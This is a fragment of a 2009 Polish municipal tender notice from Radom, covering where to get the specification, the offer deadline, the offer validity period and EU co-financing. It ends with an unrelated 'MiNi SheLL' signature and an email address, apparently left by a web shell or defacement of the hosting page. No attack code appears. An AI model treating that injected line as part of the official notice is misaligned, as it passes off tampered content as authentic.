<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.radom.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można zakupić za cenę 670,07 zł(w tym VAT); w Urzędzie Miejskim w Radomiu Wydział Inwestycji;ul.J.Kilińskiego 30,pok. 236, tel. (0 48) 36-20-634   w godz. 8-15  lub otrzymać za zalicz. pocztowym.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2009 godzina 09:00, miejsce: Urząd Miejski w Radomiu ul. Jana Kilińskiego 30, Wydział Inwestycji, pok. 242.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający ubiega się o  dofinansowane ze środków Unii Europejskiej.


Zamawiający informuje ponadto, że w przedmiotowym postępowaniu:

a) nie zamierza zawrzeć umowy ramowej; 
b) nie zamierza ustanowić dynamicznego sytemu zakupów;

Creat By MiNi SheLL
Email: jattceo@gmail.com